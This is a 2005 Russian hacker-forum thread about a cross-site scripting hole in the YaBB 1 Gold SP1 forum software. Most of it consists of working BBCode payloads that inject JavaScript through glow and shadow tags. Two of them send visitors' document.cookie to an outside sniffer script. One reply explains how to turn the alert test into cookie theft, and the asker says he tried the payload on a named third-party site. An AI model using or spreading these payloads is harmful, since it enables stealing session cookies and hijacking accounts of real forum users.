ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Уязвимость, YaBB 1 Gold - SP1, XSS атака.
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость, YaBB 1 Gold - SP1, XSS атака.
  #1  
Старый 13.12.2005, 00:18
Аватар для Romaxa55
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821

Репутация: 83
Отправить сообщение для Romaxa55 с помощью ICQ
По умолчанию Уязвимость, YaBB 1 Gold - SP1, XSS атака.
Код:
[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]
или

Код:
[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]
Что не так в этом коде, проверял на http://www.mgapi.ru/cgi-bin/yabb/
Код:
[glow=red);background:url(javascript:img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie);filter:glow(color=red,2,300]Big Exploit[/glow]
Последний раз редактировалось Romaxa55; 13.12.2005 в 00:55..
 

  #2  
Старый 13.12.2005, 00:39
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию
Так. Ну это алерт, а тебе нужно, чтобы приходили куки на сниффер, да? Ну тогда подумай головой=)) Нужно вместо
Код HTML:
alert(document.cookie)
вставить свой код. К примеру,
Код HTML:
document.location.href='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie
Но это только пример=)) Попробуй, может получится-)
Не забываем про РЕПУТАЦИЮ!

Цитата:
Код HTML:
[glow=red);background:url(javascript:new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie);filter:glow(color=red,2,3  00]Big Exploit[/glow]
Это уже готовое.

И не надо изподтишка сообщение редактировать, ок? Я ответил на вопрос, уже новым сообщением пиши, а не редактируй старое!
Последний раз редактировалось FQziT; 13.12.2005 в 00:57..
 

  #3  
Старый 13.12.2005, 00:57
Аватар для Romaxa55
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821

Репутация: 83
Отправить сообщение для Romaxa55 с помощью ICQ
По умолчанию
Да спасиб, но проблемма в том что, нет знаний в этой области, вот токо начал изучать.. ща попробую что нить.. Спасиб
 

  #4  
Старый 13.12.2005, 01:04
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию
Romaxa55 Всегда пожалуйста=)
 

  #5  
Старый 13.12.2005, 01:25
Аватар для Romaxa55
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821

Репутация: 83
Отправить сообщение для Romaxa55 с помощью ICQ
По умолчанию
Думаю тема закрыта, еще раз спасибо FQziT
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Атака SMURF - наиболее опасная разновидность атаки DDoS dinar_007 Болталка 7 14.01.2008 07:10
Уязвимость WZC в Windows XP DRON-ANARCHY Мировые новости 5 10.10.2005 23:16
Очередная уязвимость в браузре Internet Explorer DRON-ANARCHY Мировые новости 0 02.10.2005 22:28
Атака на скрипты, использующие cookie-авторизацию k00p3r Чужие Статьи 2 12.07.2005 14:19
Открытие файлов и внешние данные. Потенциальная уязвимость php-скриптов k00p3r Чужие Статьи 1 11.07.2005 19:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ